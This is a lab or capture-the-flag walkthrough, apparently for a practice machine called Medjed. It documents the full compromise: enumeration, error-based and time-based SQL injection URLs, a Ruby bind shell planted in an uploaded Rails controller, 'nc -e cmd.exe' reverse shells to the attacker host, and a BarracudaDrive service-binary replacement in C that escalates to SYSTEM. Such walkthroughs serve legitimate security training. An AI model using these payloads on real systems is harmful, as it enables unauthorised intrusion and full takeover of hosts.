# Medjed ## Information Gathering ### Service Enumeration `nmapAutomator.sh -H 192.168.237.127 -t full` `nmapAutomator.sh -H 192.168.237.127 -t vulns` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIaOtLzR5VXCOha9m%2F98a21f1b266047eebb5c23b2074e0829.png?alt=media\&token=17b4f873-3324-4e1e-a3d9-ea8b1bb5a3f6) ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIdSnn_z897pHDmzv%2F4125fc1176414228be29a1a0146d1ed9.png?alt=media\&token=c5b1badb-8c77-483e-9fbc-17021a8370fa) ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIgGtPB7BPvfIInwM%2Fd94f18ebc231434fa1942e1925aacb95.png?alt=media\&token=376d2be6-9caf-49a1-b3f5-46f82f615836) ### FTP Anonymous sessions are allowed. Recursively download the entire directory: `wget -r ftp://anonymous@192.168.237.127:30021` Seems to be the default ruby on rails installation. ### HTTP On port 3303, we find a web application with the profiles of the team. We can try to use their names as usernames to login. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIkFVjhP6Sd7RoO2L%2F6c312c0109de44bf859c6cb387fcbf4c.png?alt=media\&token=296488f8-063b-4fc9-9ea2-425862c6f3cc) There is a password reset feature. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIoHFuwVxjTmi3hRI%2Feb2f363c3f544fcb9b102ccad8186d10.png?alt=media\&token=6e69073d-4bc6-4e7e-94e3-297ce494af79) When using username `christopher`, we get "The password reminder doesn't match the records", which is different from the other users - "The user does not exist". ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIsXzEhvFAg3g7QTT%2Fdd73704ab984430ba4b6883ac56d167d.png?alt=media\&token=4de66e3f-e691-4db1-9307-512a33d49de0) Hence, we can confirm that `christopher` is a valid user. Tried: * SQL injection for password reminder (failed) I then realised that the users page is on the `/users` path. By trying `http://192.168.237.127:33033/users/christopher`, we get an error traceback. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJ3lij2xVfm3YTwsf%2Fb7e405d0d15144a59470c1442b03e2f3.png?alt=media\&token=1e5d8882-8f80-4922-87e3-79a39ab70089) Now that we know that traceback is shown, we can try to go to an invalid path to see the routes available. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadIyPxGKm11Ppb6JS6%2F19da4e71d25f49df8df9b47fb5cbb990.png?alt=media\&token=34aba64a-7ba0-415d-9916-46359f6fc1f0) `/users` takes 4 request methods: ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJ9-EUEwHfqMSWWfx%2Fc6054de84f8747a7b3405fd4e64b0698.png?alt=media\&token=ee247356-57d0-4b28-821c-ff79c3b87876) Tried: * all 4 allowed request methods (failed - authentication) There is another interesting path, `/slug`. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJETgyM7H3ulqk0ND%2F040f006b50e349c98c723bbf6d59d4ca.png?alt=media\&token=f5f99fed-137b-4173-b4f5-fc010a3016c4) When fuzzing the input, I found that a single quote causes an error. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJJ26lgpEE770xqd7%2F83492ce915c446f69d429bc13014427b.png?alt=media\&token=457b37df-9808-47be-83bb-17223f529c9d) This showed the source code for the construction of an SQL query. ```ruby sql = "SELECT username FROM users WHERE username = '" + params[:URL].to_s + "'" ``` This is a classic SQL injection vulnerability. However, the difference here is that no matter whether the query evaluates to True or False, we get the same result, i.e. we don't get any feedback on the output. However, the **MySQL error gets reflected**, so this is an **error-based injection**. ## Exploitation ### Option 1 - Time Based Boolean Blind ```sql SELECT username FROM users WHERE username = '' UNION SELECT IF(1=1, SLEEP(5), null)-- - ``` `http://192.168.237.127:33033/slug?URL=%27%20UNION%20SELECT%20IF(1=2,%20SLEEP(5),%20null)--%20-` The `IF` conditional will make the server sleep for 5 seconds if the condition is True, or respond immediately otherwise. ### Option 2 - Error Based If we do something like ```sql SELECT username FROM users WHERE username = '' AND 1= (SELECT 1 FROM(SELECT COUNT(*),concat(0x3a,(SELECT username FROM users LIMIT 0,1),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)-- - ``` The `SELECT username FROM users LIMIT 0,1` output gets reflected in the MySQL error. `http://192.168.237.127:33033/slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20username%20FROM%users%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20-` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJVMwd_fpoXp5K5tE%2F88e9f04f0fa640bc9b4e6ea1ecfb9f52.png?alt=media\&token=c3d15641-69a3-442e-ac1b-9250e0a29cdb) In this case, we can see that `evren.eagan` is the first username. Replacing the inner query with `SELECT reminder FROM USERS LIMIT 0,1`, we see the reminder, `4qpdR87QYjRbog`. {% embed url="" %} ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJ_BfxGd7Wy7Q1oxG%2Fb304646cfb9b4f7993b11fe6300ba5ca.png?alt=media\&token=a6c56c23-8c0a-45f0-80a1-14c2a9b9309e) With this, we can go back to the password reset page and successfully reset the password. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJdO1MR4Gs65ZV25k%2Fa08384f350924cb7ad860668b8c032bd.png?alt=media\&token=c7e54586-180d-4384-9487-73ad1ede127a) ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJj-3VqAJ0L8yQ5io%2F0954fae671154dcdbb04fca50dc17303.png?alt=media\&token=406762d2-9ef7-480c-a589-3295d164bbd9) Now that we login to a valid user, we gain access to the edit feature. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJm9I2qKQGrquHB6Z%2F1613a5613f7a474cae8d7e72e87ecce0.png?alt=media\&token=a9f0de7c-97cd-49fe-a4eb-981efafd23d8) ### Web File Server (WFS) There is another HTTPS service running at 44330. Here, we can upload arbitrary files. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJpuhJeNMD9j92lq2%2Fa08013d5448b4d73ac93dc89d523da57.png?alt=media\&token=4ab73c5f-917d-428f-9ed3-5750fb0a0886) We can then upload a modified version of the `users_controller.rb`, which handles HTTP requests related to the `/user` path. I edited the `PATCH/PUT` handler to include this bind shell payload: ```ruby class UsersController < ApplicationController include BCrypt before_action :authorize, only: [:new, :create, :edit, :update, :destroy] before_action :set_user, only: [:show, :edit, :update, :destroy] ... # PATCH/PUT /users/1 # PATCH/PUT /users/1.json def update require 'socket' require 'open3' #The number over loop is the port number the shell listens on. Socket.tcp_server_loop(5555) do |sock, client_addrinfo| begin while command = sock.gets Open3.popen2e("#{command}") do | stdin, stdout_and_stderr | IO.copy_stream(stdout_and_stderr, sock) end end rescue break if command =~ /IQuit!/ sock.write "Command or file not found.\n" sock.write "Type IQuit! to kill the shell forever on the server.\n" sock.write "Use ^] or ctl+C (telnet or nc) to exit and keep it open.\n" retry ensure sock.close end end ... end ``` After uploading the modified `users_controller.rb` and submitting the "Update User" form, we can then connect to the bind shell. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJtMx0Vo14HnmFY67%2Fea5fa523792c411382b0211318af27a5.png?alt=media\&token=2f23fe41-a190-4d82-b6d2-f064dafcd5b9) To get a more stable and interactive shell, we can transfer `nc.exe` and run it. Copy netcat over SMB: `copy \\192.168.49.237\ROPNOP\nc.exe .` Create another reverse shell: `nc -e cmd.exe 192.168.49.237 139` ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJx0x4OS9yB8RsGtT%2Fe355535d58254af8a77f69166995ca5c.png?alt=media\&token=3f76562c-c40b-45b9-b269-57848d77175a) ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadJzXOU4VnrE4e1Tdu%2F4b6b0f0a75c14b96b3cf27160fa29e63.png?alt=media\&token=ab83343e-8700-4980-845a-0b2da1212d1a) ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadK1Ou9olMJp89vpk3%2Fd7300e0f22074c459261ec0505aca479.png?alt=media\&token=e33debc2-41f6-46ab-b831-b1abaccfd2cd) ## Privilege Escalation In the WinPEAS output, we find an interesting AutoRun executable, `bdctl.exe`. This is an executable from the BarracudaDrive program. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadK5GsLfPTgkJOy8L4%2F761d1012fbf040b896c28a58ee7c0a55.png?alt=media\&token=22791b92-6548-4c58-8c6c-d6abf39b5912) Looking in the `C:\bd` directory, we find a `readme.txt` which shows the changelog. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadK84Fab7upIgAFSA7%2F6ceb4ce013644c20a89017ef86fbf610.png?alt=media\&token=817e5588-a38f-4b2c-9e7a-041cecf3be09) It appears that the version of BarracudaDrive is 6.5, since the changelog stops there. ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadKBN_qFuLM5PGf8Zb%2F65116cfe1c9f42519c4a472bcf2c9ea9.png?alt=media\&token=86b45cce-3cba-4d0d-8ae5-2e7e42acad9b) This version is vulnerable to a local privesc vulnerability: Create `addAdmin.c`: ```c #include #include int main(void){ system("C:\\Sites\\userpro\\nc.exe 192.168.49.237 139 -e cmd.exe"); WinExec("C:\\bd\\bd.service.exe", 0); return 0; } ``` On reboot, this will spawn a new reverse shell as SYSTEM. Cross-compile for Windows: `i686-w64-mingw32-gcc addAdmin.c -o bd.exe` Move the existing `bd.exe`: `move bd.exe bd.service.exe` Copy the new malicious `bd.exe`: `copy \\192.168.49.237\ROPNOP\bd.exe .` Now restart the system: `shutdown /r`. We should be able to catch a shell as SYSTEM: ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadKK5sx_ZpLmqc9m8T%2F93fb81e275c546ce9fb9f6c6cd06e8d9.png?alt=media\&token=f605bfed-408e-4dcd-9e53-1de025d419c7) ![](https://3387855474-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MacgVh0eYEyBhMYCCfP%2F-Macx9Lt3SwZgmbMRoGA%2F-MadKM7SPe6coBFy4ToS%2F51635976728b488aa4e72138b73b9669.png?alt=media\&token=681bb92c-8759-4cb3-b404-45544f9137c6)